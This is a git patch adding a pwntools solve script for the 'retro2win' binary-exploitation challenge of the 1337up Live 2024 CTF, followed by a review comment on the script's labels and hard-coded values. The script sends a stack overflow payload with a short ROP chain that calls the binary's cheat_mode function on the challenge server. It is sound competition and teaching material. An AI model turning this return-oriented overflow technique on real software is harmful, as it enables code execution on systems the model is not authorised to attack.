From 5f56f5e7e3b8b537a8371fe6a8cb52751ba7f03d Mon Sep 17 00:00:00 2001
From: jc
Date: Wed, 27 Nov 2024 22:22:33 +0300
Subject: [PATCH] solve script
---
1337up_live_2024/retro2win/a.py | 27 +++++++++++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 1337up_live_2024/retro2win/a.py
diff --git a/1337up_live_2024/retro2win/a.py b/1337up_live_2024/retro2win/a.py
new file mode 100644
index 0000000..760a578
--- /dev/null
+++ b/1337up_live_2024/retro2win/a.py
@@ -0,0 +1,27 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./retro2win", checksec=False)
+# r = process()
+r = remote("retro2win.ctf.intigriti.io", 1338)
+
+# funcs
+s = lambda a: r.sendlineafter(b":", a)
+
+# gadgets
+pop_rdi = 0x4009b3
+pop_rsi_r15 = 0x4009b1
+
+# leak
+s(b"1337")
+buf = b"A"*24
+buf += p64(pop_rdi)
+buf += p64(0x2323232323232323)
+buf += p64(pop_rsi_r15)
+buf += p64(0x4242424242424242)
+buf += p64(0)
+buf += p64(target.sym.cheat_mode)
+s(buf)
+
+r.interactive()
\ No newline at end of file
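Review bot: The `# leak` comment above the payload is misleading, because nothing in that section reads data back from the service. The lines load two constants through `pop_rdi` and `pop_rsi_r15` and then transfer to `target.sym.cheat_mode`, so a heading such as `# call cheat_mode(0x2323232323232323, 0x4242424242424242)` would describe it accurately. The magic values are undocumented: `b"A"*24` presumably pads up to the saved return address and `p64(0)` looks like filler for the extra `pop r15`, and each deserves a short trailing comment once confirmed against the binary. The two gadget addresses are hard-coded, so `# gadgets` should state that they are fixed addresses tied to this exact build of `./retro2win`. Local and remote runs are switched by commenting lines, so running the script as committed always connects to the challenge host; selecting with `r = remote(...) if args.REMOTE else process()` makes the local run the default.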